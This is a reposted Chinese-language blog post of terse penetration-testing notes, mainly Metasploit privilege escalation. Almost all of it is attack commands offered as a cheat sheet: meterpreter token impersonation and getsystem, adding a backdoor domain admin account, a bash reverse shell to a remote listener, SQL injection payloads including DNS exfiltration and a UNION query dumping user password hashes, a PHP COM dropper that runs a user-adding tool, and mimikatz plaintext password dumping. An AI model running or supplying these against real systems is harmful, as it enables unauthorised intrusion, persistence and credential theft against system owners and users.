碼上快樂

相關內容    簡體    繁體

msf提權基礎(一)

本文轉載自   查看原文   2018-04-14 00:05   1063    安全相關

 

 

令牌(token)相當於系統的臨時密鑰(賬號及密碼)

加載incognito模塊

meterpreter> use incognito

meterpreter > list_tokens -u    //列出可用令牌

meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator   //模擬令牌

[+] Successfully impersonated user WIN-xxxxxx\Administrator  //成功模擬成administrator用戶

meterpreter > getsystem   //自動嘗試提權

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid   //當前會話用戶身份

Server username: NT AUTHORITY\SYSTEM

 

 

 

 

 

delegation授權令牌

impersonation 模擬令牌

 

需要兩個反斜杠

impersonate_token win7-pc\\administrator

 

添加域用戶

net user ihoney ihoney1 /add /domain

 

添加到管理員組

net group “domain admins” ihoney /add /domain

 

查看域管理組

net group “domain admins” /domain

 

上傳exe

upload /root/ma.exe c:\

 

 

 

肉雞:

[root@xxx hashcrack]# bash -i >& /dev/tcp/yyy/9999 0>&1

黑客機先監聽:

[root@yyy ~]# nc -vv -l -p 9999

 

 

報錯注入

 and 1=(updatexml(1,concat(0x3a,(user())),1))#

 

whois信息收集

直接輸入whois 目標網址(不用加www)

或者輸入whois 目標IP地址

高級掃描方式:(掃描網段開了某端口的主機)

use auxiliary/scanner/ip/ipidseq

show options

set RHOSTS 目標IP網段比如2.0/24

set THREADS 50

run

掃描某主機端口

use auxiliary/scanner/portscan/syn

show options

set RHOST 目標IP

set THREADS 50

run

掃描開了smb服務的主機

use auxiliary/scanner/smb/smb_version

show options

set RHOSTS 目標網段/24

set THREADS 50

run

mssql 主機

use auxiliary/scanner/mssql/mssql_ping

show options

set RHOSTS 掃描網段/24

set THREADS 50

run

SSH服務器掃描

use auxiliary/scanner/ssh/ssh_version

show options

set RHOSTS 掃描網段/24

set THREADS 50

run

Telnet服務器掃描

use auxiliary/scanner/telnet/telnet_version

show options

set RHOSTS 掃描網段/24

set THREADS 50

run

FTP主機掃描

use auxiliary/scanner/ftp/ftp_version

show options

set RHOSTS 掃描網段/24

set THREADS 50

run

掃描FTP匿名登陸

use auxiliary/scanner/ftp/ftp_anonymous

show options

set RHOSTS 掃描網段/24

set THREADS 50

run

掃描局域網內有哪些主機存活

use auxiliary/scanner/discovery/arp_sweep

set RHOSTS 掃描網段/24

set THREADS 50

run

掃描網站目錄

use auxiliary/scanner/http/dir_scanner

set RHOST 目標IP

set THREADS 50

run

掃描SNMP主機:

use auxiliary/scanner/snmp/snmp_login

set RHOSTS 掃描網段/24

set THREADS 50

run 搜索目標網站中的E-mail地址

use auxiliary/gather/search_email_collector

set DOMAIN 目標網站(不加www

run

嗅探抓包(ftp)

use auxiliary/sniffer/psnuffle

run

 

 

 

 

httpsdnslog平台

https://exeye.io/register

 

 

sql盲注執行:

union select 1,load_file(concat(0x5c5c5c5c,version(),0x78782E74657374312E69686F6E65797365632E746F702F696969));

數據庫執行時會訪問dnslog域名:

xx.test1.ihoneysec.top/iii

 

 

 

[更新]Mysql身份認證漏洞及利用(CVE-2012-2122)www.freebuf.com/vuls/3815.html

 

 

常用提權命令:

whoami

net user

net view

net start 啟動的服務

systeminfo

hostname

ipconfig /all

tasklist /svc 尋找Termservice找到PID

netstat -ano 找到監聽端口

arp -a

route print

netsh firewall show state

netsh firewall show config

dir

type

copy

 

 

 

相關文章:

http://www.5kik.com/phpnews/3.html (php利用wsh以及Shell.Application執行命令)

https://blog.csdn.net/jaray/article/details/49093317(運行Php提示COM未找到)

https://www.cnblogs.com/phpk/p/6097353.html ini_set("display_errors","On");和error_reporting(E_ALL);

 

前提:

需要知道網站路徑,上傳wucanshu.exe(F4ck的api加用戶工具)

 

 

訪問http://ip/wsh.php

<?php

ini_set("display_error", "On");

error_reporting(E_ALL);

echo 1;

$wsh = new COM("shell.Application") or dir("Failed!");

$exec = $wsh->open("C:\\www\\wucantishi.exe");

echo $exec;

echo 21;

?>

 

 

運行即API添加用戶:

UserName:F4ck

PassWord:F4ckTeam!@#

 

 

菜刀下載大文件可能會失敗,改后綴為rar用瀏覽器下載

 

IIS 8.0默認404禁止下載mdb后綴文件

 

 

兩條命令讀取明文密碼:

privilege::debug

sekurlsa::logonpasswords

 

msf加載mimikatz讀明文:

meterpreter > use mimikatz

meterpreter > wdigest

 

F4ck帶參數添加用戶:

7.exe ceshi 12345678 administrator /add

會克隆一個管理員用戶

 

抓取sqlmap的爆所有數據庫名語句:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT NULL,NULL,CONCAT(0x716a626a71,IFNULL(CAST(schema_name AS CHAR),0x20),0x7171786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA%23

 

手工測試讀取數據庫名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(schema_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.SCHEMATA%23

 

表名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(table_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.tables where table_schema=0x736561%23

 

列名:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(column_name),4,5,6,7,8,9,10,11,12 FROM INFORMATION_SCHEMA.columns where table_schema=0x736561 and table_name='nh_user'%23

 

讀賬密:

http://127.0.0.1/sea/sea/Home/Index/data.html?data=28) UNION ALL SELECT 1,2,GROUP_CONCAT(id,'%2c',username,'%2c',password),4,5,6,7,8,9,10,11,12 FROM sea.nh_user%23

  [0001]《1,xiaodi,c44af6fc4c97a6b1e93885cc4ae399f2

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 用MSF進行提權 msf 之 webshell 提權 msf利用- windows內核提權漏洞 網站提權之MSF騷操作 【滲透測試】Msf提權步驟 windows基礎提權 windows提權篇 msf提權-爛土豆提權-dll劫持提權-不帶引號服務路徑提權 linux提權原理和基礎 使用msf查詢補丁和可利用提權漏洞 提權
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM